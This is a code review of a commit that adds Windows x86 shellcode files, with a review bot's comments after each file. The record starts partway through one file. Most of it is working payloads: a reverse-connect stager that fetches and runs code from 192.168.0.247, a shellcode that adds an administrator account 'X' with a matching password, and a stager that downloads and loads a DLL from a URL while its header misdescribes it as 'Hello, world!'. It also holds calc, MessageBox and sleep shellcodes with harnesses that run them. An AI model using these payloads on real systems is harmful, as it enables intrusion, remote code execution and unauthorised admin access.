jmp short LHshlp
LFnd:
cmp edi, [esp + 20]
jnz LFnlp
mov ebx, [edx + 36]
add ebx, ebp
mov cx, [ebx + 2 * ecx]
mov ebx, [edx + 28]
add ebx, ebp
mov eax, [ebx + 4 * ecx]
add eax, ebp
jmp short LDone
LNtfnd:
xor eax, eax
LDone:
mov edx, ebp
pop edi
pop esi
pop ebp
pop ebx
ret 8
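
Review bot: the table in `LDataSegment` lists ten 32-bit values with function names but nowhere says how they are derived. `LHshlp` computes them with `ror edi, 13` then `add edi, eax` over each byte of the export name, so a header line naming that hash would let a reader verify an entry such as `0xec0e4e8e ; LoadLibraryA` and would tell an analyst that these constants, not import names, are what to search for. The port comment on `push dword 0x11220002` is correct (bytes `22 11`, 8721), but the header's Function line should carry the port too.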

@ -0,0 +1,135 @@
; Title: Windows 2000 Vampiric Import Reverse Connect
; Platforms: Windows 2000
; Function: Attach to dbmssocn.dll, use IAT to connect, read/exec payload
; Author: hdm[at]metasploit.com
; Compile: nasm -f bin -o win2000_vampiric_connector.bin win2000_vampiric_connector.asm
[BITS 32]
%define ESIMOD add si, 0x3000
%define DBMSSOCN_WSAStartup [esi + 0x6C]
%define DBMSSOCN_connect [esi + 0x4C]
%define DBMSSOCN_recv [esi + 0x54]
%define DBMSSOCN_send [esi + 0x5C]
%define DBMSSOCN_socket [esi + 0x74]
; uncomment this for better error handling and persistent reconnects
; %define NICE
global _start
_start:
LKernel32Base:
push byte 0x30
pop ecx
mov eax, [fs:ecx]
mov eax, [eax + 0x0c]
mov esi, [eax + 0x1c]
lodsd
mov ebp, [eax + 0x08]
mov eax, [ebp + 0x3c]
mov edx, [ebp + eax + 120]
add edx, ebp
mov ecx, [edx + 24]
mov ebx, [edx + 32]
add ebx, ebp
LFinderLoop:
%ifdef NICE
jecxz LNotFound
%endif
dec ecx
mov esi, [ebx + ecx * 4]
add esi, ebp
xor edi, edi
cld
LHasher:
xor eax, eax
lodsb
cmp al, ah
je short LFound
ror edi, 13
add edi, eax
jmp short LHasher
LFound:
cmp edi, 0xec0e4e8e ; LoadLibraryA
jnz short LFinderLoop
mov ebx, [edx + 36]
add ebx, ebp
mov cx, [ebx + 2 * ecx]
mov ebx, [edx + 28]
add ebx, ebp
mov eax, [ebx + 4 * ecx]
add eax, ebp
jmp short LFinderDone
%ifdef NICE
LNotFound:
xor eax, eax
%endif
LFinderDone:
call LoadDBMSSOCN
LDataSegment:
;========================
db "DBMSSOCN.DLL"
db 0x00, 0xFF ; second byte only added for easy disasm
;========================
LoadDBMSSOCN:
call eax ; LoadLibraryA (ptr to dll on stack)
mov esi, eax ; esi used by all DBMSSOCN functions
ESIMOD ; inc base to save space on the calls
xor edi, edi ; edi is just a null
LWSAStartup:
sub sp, 400
push esp
push dword 0x101
call DBMSSOCN_WSAStartup
LSocket:
push edi
push edi
push edi
push edi
inc edi
push edi
inc edi
push edi
call DBMSSOCN_socket
mov ebx, eax
LConnect:
push 0xF700A8C0 ; host: 192.168.0.247
push 0x11220002 ; port: 8721
mov ecx, esp
push byte 0x10
push ecx
push ebx
call DBMSSOCN_connect ; set eax to 0 on success
%ifdef NICE
test eax,eax
jnz LConnect
xor eax, eax
%endif
LReadCodeFromSocket:
add di, 0xffe ; read 4096 bytes of payload (edi == 2)
sub esp, edi
mov ebp, esp
push eax ; flags
push edi ; length
push ebp ; buffer
push ebx ; socket
call DBMSSOCN_recv ; recv(socket, buffer, length, flags)
jmp esp ; jump into new payload
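
Review bot: the five `DBMSSOCN_*` offsets and `ESIMOD add si, 0x3000` are tied to one build of dbmssocn.dll, and the header names only the platform. Record the DLL version the offsets were taken from next to the `%define` lines, since on another build the same offsets may point at different import slots. `add si, 0x3000` also changes only the low 16 bits of `esi`, which deserves a comment stating the assumption that no carry out of bit 15 occurs.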

@ -0,0 +1,200 @@
; Title: Win32Create Admin User Account
; Platforms: Windows NT 4.0, Windows 2000, Windows XP
; Function: NetUserAdd(X); NetLocalGroupAddMembers(X, Administrators);
; Author: hdm[at]metasploit.com
[BITS 32]
global _start
_start:
sub sp, 128
mov esi, esp
; [esi]
; 00 kernel32.dll
; 04 netapi32.dll
; 08 LoadLibraryA
; 12 ExitProcess
; 16 NetUserAdd
; 20 NetLocalGroupAddMembers
; 24 user/pass
; 28 group
; get base kernel32 address
call LK32Base
mov [esi], eax
mov ebx, eax
; GetProcAddress(ExitProcess)
push ebx
push 0x73e2d87e
call LGetProcAddress
mov [esi + 12], eax
; GetProcAddress(LoadLibraryA)
push ebx
push 0xec0e4e8e
call LGetProcAddress
mov [esi + 8], eax
; LoadLibrary(netapi32.dll)
xor ebx, ebx
push ebx
push 0x32336970
push 0x6174656e
push esp
call eax
mov [esi + 4], eax
mov ebx, eax
; GetProcAddress(NetUserAdd)
push ebx
push 0xcd7cdf5e
call LGetProcAddress
mov [esi + 16], eax
; GetProcAddress(NetLocalGroupAddMembers)
push ebx
push 0xc30c3dd7
call LGetProcAddress
mov [esi + 20], eax
; useful register values
xor eax, eax
xor ebx, ebx
inc ebx
; push the group (Administrators)
push eax
push 0x00730072
push 0x006f0074
push 0x00610072
push 0x00740073
push 0x0069006e
push 0x0069006d
push 0x00640041
mov [esi + 28], esp
; push the username (X)
push eax
push 0x00000058
mov ecx, esp
mov [esi + 24], ecx
; add the \ to the username
push 0x005c0000
; create the NetUserAdd arguments
push eax
push ebx
push eax
push eax
push ebx
push eax
push ecx
push ecx
mov ecx, esp
push eax
push esp
push ecx
push ebx
push eax
; call NetUserAdd(X)
call [esi + 16]
; create the NetLocalGroupAddMembers arguments
mov ecx, [esi + 24]
dec ecx
dec ecx
push ecx
mov ecx, esp
push byte 1
push ecx
push byte 3
push dword [esi + 28]
push byte 0
; call NetLocalGroupAddMembers
call [esi + 20]
LFinished:
call [esi + 12]
LK32Base:
push esi
push byte 0x30
pop ecx
mov eax, [fs:ecx]
mov eax, [eax + 0x0c]
mov esi, [eax + 0x1c]
lodsd
mov eax, [eax + 0x08]
pop esi
ret 4
LGetProcAddress:
push ebx
push ebp
push esi
push edi
mov ebp, [esp + 24]
mov eax, [ebp + 0x3c]
mov edx, [ebp + eax + 120]
add edx, ebp
mov ecx, [edx + 24]
mov ebx, [edx + 32]
add ebx, ebp
LFnlp:
jecxz LNtfnd
dec ecx
mov esi, [ebx + ecx * 4]
add esi, ebp
xor edi, edi
cld
LHshlp:
xor eax, eax
lodsb
cmp al, ah
je LFnd
ror edi, 13
add edi, eax
jmp short LHshlp
LFnd:
cmp edi, [esp + 20]
jnz LFnlp
mov ebx, [edx + 36]
add ebx, ebp
mov cx, [ebx + 2 * ecx]
mov ebx, [edx + 28]
add ebx, ebp
mov eax, [ebx + 4 * ecx]
add eax, ebp
jmp short LDone
LNtfnd:
xor eax, eax
LDone:
mov edx, ebp
pop edi
pop esi
pop ebp
pop ebx
ret 8
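
Review bot: the Function line in the header hides which credential is set. Slot 24 is labelled `user/pass` and the same pointer in `ecx` is pushed twice while the `NetUserAdd` structure is built, so the account `X` is created with its own name as the password before being added to Administrators; put that in the header so a responder knows what to look for. The title reads `Win32Create`, missing a space, and `LGetProcAddress` repeats the routine in the bind shell file line for line and would be better kept in one include.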

@ -0,0 +1,22 @@
/*
win32/xp sp3 (FR) Sleep 14 bytes
Author : optix hacker <aidi youssef>
Mail : optix@9.cn
notice Tested Under Windows XP SP3 (fr)
this shellcode makes a sleep for 90000ms=90s=1,5min
this is API from kernel32.dll for sleep :0x7C802446 in win32 xp sp3 (fr)
assembly code is secret in this shellcode :)
*/
#include <stdio.h>
unsigned char shellcode[] ="\x31"
"\xC0\xB9\x46\x24\x80\x7C\x66\xB8\x90\x5F\x50\xFF\xD1";
int main ()
{
int *ret;
ret=(int *)&ret+2;
printf("Shellcode Length is : %d\n",strlen(shellcode));
(*ret)=(int)shellcode;
return 0;
}
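
Review bot: the comment says the delay is 90000 ms, but the bytes `\x66\xB8\x90\x5F` load only the 16-bit value 0x5F90 into `ax` after `eax` is cleared, so the argument pushed is 24464 ms. 90000 is 0x15F90 and does not fit in a 16-bit move; correct the comment to match the bytes. The harness calls `strlen` without including `<string.h>`, and the source is withheld ("assembly code is secret"), so add the listing to let the bytes be checked against it.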

@ -0,0 +1,71 @@
+-------------------------------------------------+
| Windows XP Pro Sp2 English "Wordpad" Shellcode. |
+-------------------------------------------------+
Size : 15 Bytes.
Author: Aodrulez.
Email : f3arm3d3ar@gmail.com
Shellcode = "\x6A\x05\x68\x97\x4C\x80\x7C\xB8"
"\x4D\x11\x86\x7C\xFF\xD0\xCC";
+-----------+
| Asm Code: |
+-----------+
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
start:
push 5
push 7c804c97h ;addr of "write" string in mem
mov eax,7c86114dh ;addr of "WinExec" Function.
call eax
int 3h
end start
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+-----------------+
| Shellcodetest.c |
+-----------------+
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
char code[] = "\x6A\x05\x68\x97\x4C"
"\x80\x7C\xB8\x4D\x11"
"\x86\x7C\xFF\xD0\xCC";
int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+-------------------+
| Greetz Fly Out To |
+-------------------+
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1] Amforked() : My Mentor.
2] The Blue Genius : My Boss.
3] www.orchidseven.com
4] www.isacm.org.in
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

@ -0,0 +1,45 @@
/*
[+] win32/xp pro sp3 (calc) 57 bytes
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ###################################### 1
0 I'm cr4wl3r member from Inj3ct0r Team 1
1 ###################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+]Discovered By: cr4wl3r
*/
#include <stdio.h>
#include <string.h>
int main() {
char shell[] = "\xb8\xff\xef\xff\xff\xf7\xd0\x2b\xe0\x55\x8b\xec"
"\x33\xff\x57\x83\xec\x04\xc6\x45\xf8\x63\xc6\x45"
"\xf9\x6d\xc6\x45\xfa\x64\xc6\x45\xfb\x2e\xc6\x45"
"\xfc\x65\xc6\x45\xfd\x78\xc6\x45\xfe\x65\x8d\x45"
"\xf8\x50\xbb\xc7\x93\xbf\x77\xff\xd3";
printf("Shellcode lenght %d\n", strlen(shell));
getchar();
((void (*)()) shell)();
return 0;
}
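
Review bot: there is no disassembly or comment for the 57 bytes, and the only target-specific value, the address `0x77bf93c7` loaded by `\xbb\xc7\x93\xbf\x77` before the final `\xff\xd3`, is not attributed to a function, module or OS build beyond the title. Add the listing and name what that address is expected to be. The `printf` string misspells "length" and prints `strlen(shell)` with `%d`.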

@ -0,0 +1,26 @@
/*
| Title: Windows Xp Pro SP3 Fr (calc.exe) Shellcode 31 Bytes
| Type: Shellcode
| Author: agix
| Platform: win32
*/
#include <stdio.h>
char shellcode[] =
"\xEB\x10" //jmp short 0x12
"\x5B" //pop ebx
"\x53" //push ebx
"\xBB\xAD\x23\x86\x7C" //mov ebx, 0x7c8623ad
"\xFF\xD3" //call ebx
"\xBB\xFA\xCA\x81\x7C" //mov ebx, 0x7c81cafa
"\xFF\xD3" //call ebx
"\xE8\xEB\xFF\xFF\xFF" //call dword 0x2
//db calc.exe
"\x63\x61\x6C\x63\x2E\x65\x78\x65";
int main(int argc, char **argv) {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int) shellcode;
}
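
Review bot: `ret = (int *)&ret + 2; (*ret) = (int) shellcode;` writes to whatever lies two ints above the local `ret`, which is the saved return address only for one particular compiler and frame layout, and is undefined behaviour in C. Call through a function pointer as the other test programs in this commit do, and return a value from `main`. The two call targets `0x7c8623ad` and `0x7c81cafa` are commented as raw addresses without the function names they stand for.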

@ -0,0 +1,101 @@
; Copyright (c) 2009-2010, Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
; Project homepage: http://code.google.com/p/w32-dl-loadlib-shellcode/
; All rights reserved. See COPYRIGHT.txt for details.
BITS 32
; Windows x86 null-free shellcode that writes "Hello, world!" to stdout.
; Works in any console application for Windows 5.0-7.0 all service packs.
; (See http://skypher.com/wiki/index.php/Hacking/Shellcode).
; This version uses 16-bit hashes.
%define url 'http://skypher.com/dll'
%strlen sizeof_url url
%include 'w32-dl-loadlib-shellcode-hash-list.asm'
%define B2W(b1,b2) (((b2) << 8) + (b1))
%define W2DW(w1,w2) (((w2) << 16) + (w1))
%define B2DW(b1,b2,b3,b4) (((b4) << 24) + ((b3) << 16) + ((b2) << 8) + (b1))
%define buffer_size 0x7C
%ifdef STACK_ALIGN
AND SP, 0xFFFC
%endif
MOV EDI, W2DW(hash_kernel32_LoadLibraryA, hash_urlmon_URLDownloadToCacheFileA)
find_hash: ; Find ntdll's InInitOrder list of modules:
PUSH EDI ; Stack = (hash, hash) [, &(url), &(LoadLibraryA)]
XOR ESI, ESI ; ESI = 0
MOV ESI, [FS:ESI + 0x30] ; ESI = &(PEB) ([FS:0x30])
MOV ESI, [ESI + 0x0C] ; ESI = PEB->Ldr
MOV ESI, [ESI + 0x1C] ; ESI = PEB->Ldr.InInitOrder (first module)
next_module: ; Get the baseaddress of the current module and find the next module:
MOV EBP, [ESI + 0x08] ; EBP = InInitOrder[X].base_address
MOV ESI, [ESI] ; ESI = InInitOrder[X].flink == InInitOrder[X+1]
get_proc_address_loop: ; Find the PE header and export and names tables of the module:
MOV EBX, [EBP + 0x3C] ; EBX = &(PE header)
MOV EBX, [EBP + EBX + 0x78] ; EBX = offset(export table)
ADD EBX, EBP ; EBX = &(export table)
MOV ECX, [EBX + 0x18] ; ECX = number of name pointers
JCXZ next_module ; No name pointers? Next module.
next_function_loop: ; Get the next function name for hashing:
MOV EDI, [EBX + 0x20] ; EDI = offset(names table)
ADD EDI, EBP ; EDI = &(names table)
MOV EDI, [EDI + ECX * 4 - 4] ; EDI = offset(function name)
ADD EDI, EBP ; EDI = &(function name)
XOR EAX, EAX ; EAX = 0
CDQ ; EDX = 0
hash_loop: ; Hash the function name and compare with requested hash
XOR DL, [EDI]
ROR DX, BYTE hash_ror_value
SCASB
JNE hash_loop
CMP DX, [ESP]
LOOPNE next_function_loop ; Not the right hash and functions left in module? Next function
JNE next_module ; Not the right hash and no functions left in module? Next module
; Found the right hash: get the address of the function:
MOV EDX, [EBX + 0x24] ; ESI = offset ordinals table
ADD EDX, EBP ; ESI = &oridinals table
MOVZX EDX, WORD [EDX + 2 * ECX] ; ESI = ordinal number of function
MOV EDI, [EBX + 0x1C] ; EDI = offset address table
ADD EDI, EBP ; EDI = &address table
ADD EBP, [EDI + 4 * EDX] ; EBP = &(function)
; Move to the next hash, this sets ECX to 0 if there are no more hashes:
POP CX ; CX = hash | Stack = hash [, &(url), &(LoadLibraryA)]
POP CX ; CX = hash | Stack = [&(url), &(LoadLibraryA)]
MOV AH, 0x1 ; EAX = 0x100
JCXZ download_and_loadlibrary ; No more hashes
MOV EDI, ECX ; EDI = hashes
SUB ESP, EAX ; Stack = buffer (0x100 bytes)
PUSH AX ; Stack = (0, 1), buffer
PUSH B2DW('l', 'm', 'o', 'n') ; Stack = "lmon", (0, 1), buffer
PUSH WORD B2W('u', 'r') ; Stack = "urlmon", (0, 1), buffer
PUSH ESP ; Stack = &("urlmon"), "urlmon", (0, 1), buffer
CALL EBP ; LoadLibraryA("urlmon")
PUSH EBP ; Stack = &(LoadLibraryA), buffer
CALL find_hash ; Stack = &(url), &(LoadLibraryA), buffer
db url
download_and_loadlibrary: ; Stack = &(url), &(LoadLibraryA), buffer
POP ESI ; ESI = &(url) | Stack = &(LoadLibraryA), buffer
POP EDX ; EDX = &(LoadLibraryA) | Stack = buffer
; Copy url to stack and NULL terminate it:
MOV EDI, ESP ; EDI = &(buffer)
PUSH BYTE sizeof_url ;
POP ECX ; ECX = sizeof(url)
REP MOVSB ; Stack = url buffer | EDI = &(buffer)
STOSB ; Stack = url, 0, buffer | EDI = &(buffer)
MOV ESI, ESP ; ESI = &(url)
; Create a ret-into-libc stack chain to make URLDownloadToCacheFileA() return to LoadLibraryA():
; LoadLibraryA(
PUSH EDI ; __in LPCTSTR lpFileName = &(buffer)
PUSH ECX ; ) return address = NULL
; URLDownloadToCacheFileA(
PUSH ECX ; __in IBindStatusCallback *pBSC = NULL
PUSH ECX ; DWORD dwReserved = NULL
; Our buffer is not really 0x100 bytes long anymore because we used part of it to store the URL... oh well.
PUSH EAX ; __in DWORD cchFileName = sizeof(buffer)
PUSH EDI ; __out LPTSTR szFileName = &(buffer)
PUSH ESI ; __in LPCSTR szURL = &(url)
PUSH ECX ; __in LPUNKNOWN lpUnkcaller = NULL
PUSH EDX ; ) return address = LoadLibraryA
; Start the ret-into-libc chain:
JMP EBP ; Jump to URLDownloadToCacheFileA, then return to LoadLibraryA
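
Review bot: The header comment says this file "writes "Hello, world!" to stdout", but the body defines `url`, resolves `LoadLibraryA` and `URLDownloadToCacheFileA` by hash, and chains a download into a library load; correct the description so anyone triaging the file sees what it actually does. `buffer_size` is defined as 0x7C and not used in the lines shown while the code reserves 0x100 bytes, and the three comments on the ordinal lookup (`MOV EDX, [EBX + 0x24]` onward) name ESI where the instructions write EDX.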

@ -0,0 +1,63 @@
; Copyright (c) 2009-2010, Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
; Project homepage: http://code.google.com/p/w32-dl-loadlib-shellcode/
; All rights reserved. See COPYRIGHT.txt for details.
BITS 32
; Windows x86 null-free shellcode that executes calc.exe.
; Works in any application for Windows 5.0-7.0 all service packs.
; (See http://skypher.com/wiki/index.php/Hacking/Shellcode).
; This version uses 16-bit hashes.
%include 'w32-exec-calc-shellcode-hash-list.asm'
%define B2W(b1,b2) (((b2) << 8) + (b1))
%define W2DW(w1,w2) (((w2) << 16) + (w1))
%define B2DW(b1,b2,b3,b4) (((b4) << 24) + ((b3) << 16) + ((b2) << 8) + (b1))
%ifdef STACK_ALIGN
AND SP, 0xFFFC
%endif
find_hash: ; Find ntdll's InInitOrder list of modules:
XOR ESI, ESI ; ESI = 0
PUSH ESI ; Stack = 0
MOV ESI, [FS:ESI + 0x30] ; ESI = &(PEB) ([FS:0x30])
MOV ESI, [ESI + 0x0C] ; ESI = PEB->Ldr
MOV ESI, [ESI + 0x1C] ; ESI = PEB->Ldr.InInitOrder (first module)
next_module: ; Get the baseaddress of the current module and find the next module:
MOV EBP, [ESI + 0x08] ; EBP = InInitOrder[X].base_address
MOV ESI, [ESI] ; ESI = InInitOrder[X].flink == InInitOrder[X+1]
get_proc_address_loop: ; Find the PE header and export and names tables of the module:
MOV EBX, [EBP + 0x3C] ; EBX = &(PE header)
MOV EBX, [EBP + EBX + 0x78] ; EBX = offset(export table)
ADD EBX, EBP ; EBX = &(export table)
MOV ECX, [EBX + 0x18] ; ECX = number of name pointers
JCXZ next_module ; No name pointers? Next module.
next_function_loop: ; Get the next function name for hashing:
MOV EDI, [EBX + 0x20] ; EDI = offset(names table)
ADD EDI, EBP ; EDI = &(names table)
MOV EDI, [EDI + ECX * 4 - 4] ; EDI = offset(function name)
ADD EDI, EBP ; EDI = &(function name)
XOR EAX, EAX ; EAX = 0
CDQ ; EDX = 0
hash_loop: ; Hash the function name and compare with requested hash
XOR DL, [EDI]
ROR DX, BYTE hash_ror_value
SCASB
JNE hash_loop
CMP DX, hash_kernel32_WinExec
LOOPNE next_function_loop ; Not the right hash and functions left in module? Next function
JNE next_module ; Not the right hash and no functions left in module? Next module
; Found the right hash: get the address of the function:
MOV EDX, [EBX + 0x24] ; ESI = offset ordinals table
ADD EDX, EBP ; ESI = &oridinals table
MOVZX EDX, WORD [EDX + 2 * ECX] ; ESI = ordinal number of function
MOV EDI, [EBX + 0x1C] ; EDI = offset address table
ADD EDI, EBP ; EDI = &address table
ADD EBP, [EDI + 4 * EDX] ; EBP = &(function)
; create the calc.exe string
PUSH B2DW('.', 'e', 'x', 'e') ; Stack = ".exe", 0
PUSH B2DW('c', 'a', 'l', 'c') ; Stack = "calc.exe", 0
PUSH ESP ; Stack = &("calc.exe"), "calc.exe", 0
XCHG EAX, [ESP] ; Stack = 0, "calc.exe", 0
PUSH EAX ; Stack = &("calc.exe"), 0, "calc.exe", 0
CALL EBP ; WinExec(&("calc.exe"), 0);
INT3 ; Crash
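
Review bot: The comments on the ordinal lookup name the wrong register: `MOV EDX, [EBX + 0x24]`, `ADD EDX, EBP` and `MOVZX EDX, WORD [EDX + 2 * ECX]` are annotated "ESI = ..." although all three write EDX, and "oridinals" is misspelled. The "Project homepage" line still points at w32-dl-loadlib-shellcode while the file includes `w32-exec-calc-shellcode-hash-list.asm`, and the label `get_proc_address_loop` is never a jump target in this file, so either drop it or say in a comment why it is kept.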

@ -0,0 +1,81 @@
; Copyright (c) 2009-2010, Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
; Project homepage: http://code.google.com/p/w32-dl-loadlib-shellcode/
; All rights reserved. See COPYRIGHT.txt for details.
BITS 32
; Windows x86 null-free shellcode that executes calc.exe.
; Works in any application for Windows 5.0-7.0 all service packs.
; (See http://skypher.com/wiki/index.php/Hacking/Shellcode).
; This version uses 16-bit hashes.
%include 'w32-msgbox-shellcode-hash-list.asm'
%define B2W(b1,b2) (((b2) << 8) + (b1))
%define W2DW(w1,w2) (((w2) << 16) + (w1))
%define B2DW(b1,b2,b3,b4) (((b4) << 24) + ((b3) << 16) + ((b2) << 8) + (b1))
%ifdef STACK_ALIGN
AND SP, 0xFFFC
%endif
find_hash: ; Find ntdll's InInitOrder list of modules:
XOR ESI, ESI ; ESI = 0
PUSH ESI ; Stack = 0
MOV ESI, [FS:ESI + 0x30] ; ESI = &(PEB) ([FS:0x30])
MOV ESI, [ESI + 0x0C] ; ESI = PEB->Ldr
MOV ESI, [ESI + 0x1C] ; ESI = PEB->Ldr.InInitOrder (first module)
next_module: ; Get the baseaddress of the current module and find the next module:
MOV EBP, [ESI + 0x08] ; EBP = InInitOrder[X].base_address
MOV ESI, [ESI] ; ESI = InInitOrder[X].flink == InInitOrder[X+1]
get_proc_address_loop: ; Find the PE header and export and names tables of the module:
MOV EBX, [EBP + 0x3C] ; EBX = &(PE header)
MOV EBX, [EBP + EBX + 0x78] ; EBX = offset(export table)
ADD EBX, EBP ; EBX = &(export table)
MOV ECX, [EBX + 0x18] ; ECX = number of name pointers
JCXZ next_module ; No name pointers? Next module.
next_function_loop: ; Get the next function name for hashing:
MOV EDI, [EBX + 0x20] ; EDI = offset(names table)
ADD EDI, EBP ; EDI = &(names table)
MOV EDI, [EDI + ECX * 4 - 4] ; EDI = offset(function name)
ADD EDI, EBP ; EDI = &(function name)
XOR EAX, EAX ; EAX = 0
CDQ ; EDX = 0
hash_loop: ; Hash the function name and compare with requested hash
XOR DL, [EDI]
ROR DX, BYTE hash_ror_value
SCASB
JNE hash_loop
CMP DX, hash_user32_MessageBoxA
JE found_MessageBoxA ;
CMP DX, hash_kernel32_LoadLibraryA
LOOPNE next_function_loop ; Not the right hash and functions left in module? Next function
JNE next_module ; Not the right hash and no functions left in module? Next module
found_MessageBoxA:
; Found the right hash: get the address of the function:
MOV EDX, [EBX + 0x24] ; EDX = offset ordinals table
ADD EDX, EBP ; EDX = &oridinals table
MOVZX EDX, WORD [EDX + 2 * ECX] ; EDX = ordinal number of function
MOV EDI, [EBX + 0x1C] ; EDI = offset address table
ADD EDI, EBP ; EDI = &address table
ADD EBP, [EDI + 4 * EDX] ; EBP = &(function)
TEST ESI, ESI
JZ show_MesageBoxA
PUSH B2DW('3', '2', ' ', ' ') ; Stack = "er32", 0
PUSH B2DW('u', 's', 'e', 'r') ; Stack = " user32", 0
PUSH ESP ; Stack = &(" user32"), " user32", 0
CALL EBP ; LoadLibraryA(&(" user32"));
XCHG EAX, EBP ; EBP = &(user32.dll)
XOR ESI, ESI ; ESI = 0
PUSH ESI ; Stack = 0, " user32", 0
JMP get_proc_address_loop
show_MesageBoxA:
; create the "Hello world!" string
PUSH B2DW('r', 'l', 'd', '!') ; Stack = "rld!", 0, " user32", 0
PUSH B2DW('o', ' ', 'w', 'o') ; Stack = "o world!", 0, " user32", 0
PUSH B2DW('H', 'e', 'l', 'l') ; Stack = "Hello world!", 0, " user32", 0
PUSH ESP ; Stack = &("Hello world!"), "Hello world!", 0, " user32", 0
XCHG EAX, [ESP] ; Stack = 0, "Hello world!", 0, " user32", 0
PUSH EAX ; Stack = &("Hello world!"), 0, "Hello world!", 0, " user32", 0
PUSH EAX ; Stack = &("Hello world!"), &("Hello world!"), 0, "Hello world!", 0, " user32", 0
PUSH ESI ; Stack = 0, &("Hello world!"), &("Hello world!"), 0, "Hello world!", 0, " user32", 0
CALL EBP ; MessageBoxA(NULL, &("Hello world!"), &("Hello world!"), MB_OK);
INT3 ; Crash
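
Review bot: The header comment says this file "executes calc.exe", but it includes `w32-msgbox-shellcode-hash-list.asm` and ends in a `MessageBoxA` call with the string "Hello world!"; the description looks copied from the calc variant and should be corrected. The label `show_MesageBoxA` is misspelled (consistently, so it still resolves), and the stack comments on the two library-name pushes ("er32", " user32") do not match the bytes pushed, which are "user" followed by "32" and two spaces.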

@ -0,0 +1,32 @@
# Title : win32/xp sp3 (Tr) MessageBoxA Shellcode 109 bytes
# Proof : http://img443.imageshack.us/img443/7900/proofaz.jpg
# Author : ZoRLu
# mail-msn : admin@yildirimordulari.com
# Home : z0rlu.blogspot.com
# Date : 14/09/2010
# Tesekkur : inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Temenni : Yeni Anayasamiz Hayirli Olsun
# Lakirdi : I dont know very well assembly. but, I know I will learn its too :P
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(){
unsigned char shellcode[]=
"\x31\xc0\x31\xdb\x31\xd9\x31\xd2\xeb\x35\x59\x88\x51\x0a\xbb\x7b\x1d"
"\x80\x7c\x51\xff\xd3\xeb\x37\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\x30"
"\xae\x80\x7c\xff\xd3\xeb\x37\x59\x31\xd2\x88\x51\x07\x52\x52\x51\x52"
"\xff\xd0\x31\xd2\x50\xb8\xfa\xca\x81\x7c\xff\xd0\xe8\xc6\xff\xff\xff"
"\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc4\xff\xff\xff\x4d"
"\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc4\xff\xff\xff\x69"
"\x74\x73\x20\x6f\x6b\x21\xff";
printf("Size = %d bytes\n", strlen(shellcode));
((void (*)())shellcode)();
return 0;
}
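
Review bot: The header block (`# Title : ...` through `# Lakirdi : ...`) sits above `#include <stdio.h>` as bare `#` lines, which a C preprocessor rejects as invalid directives, so the file does not compile as posted; wrap the header in a `/* ... */` comment. The payload is an uncommented byte string that loads absolute addresses (0x7c801d7b and 0x7c80ae30 among them) before `call ebx`; add a disassembly listing or at least name what each address is expected to be on the stated XP SP3 (Tr) target.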

@ -0,0 +1,29 @@
# Title : win32/xp sp3 (Tr) calc.exe Shellcode 53 bytes
# Proof : http://img178.imageshack.us/img178/548/proofxw.jpg
# Author : ZoRLu / http://inj3ct0r.com/author/577
# mail-msn : admin@yildirimordulari.com
# Home : http://z0rlu.blogspot.com
# Date : 15/09/2010
# Tesekkur : inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Temenni : Yeni Anayasamiz Hayirli Olsun
# Lakirdi : I dont know very well assembly. but, I know I will learn its too :P
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(){
unsigned char shellcode[]=
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x13\x53\xbb\xad\x23\x86\x7c"
"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x63\x61\x6c\x63\x2e\x65"
"\x78\x65";
printf("Size = %d bytes\n", strlen(shellcode));
((void (*)())shellcode)();
return 0;
}
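
Review bot: `printf("Size = %d bytes\n", strlen(shellcode));` passes a `size_t` to `%d` and hands an `unsigned char *` to `strlen`, which expects `const char *`; report `sizeof(shellcode) - 1` with `%zu` instead, which also stays correct if the array ever contains a zero byte. The title says "calc.exe" while the trailing bytes spell the command line "cmd.exe /c calc.exe"; put that string in a comment so a reader does not have to decode hex to see what is launched.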

@ -0,0 +1,29 @@
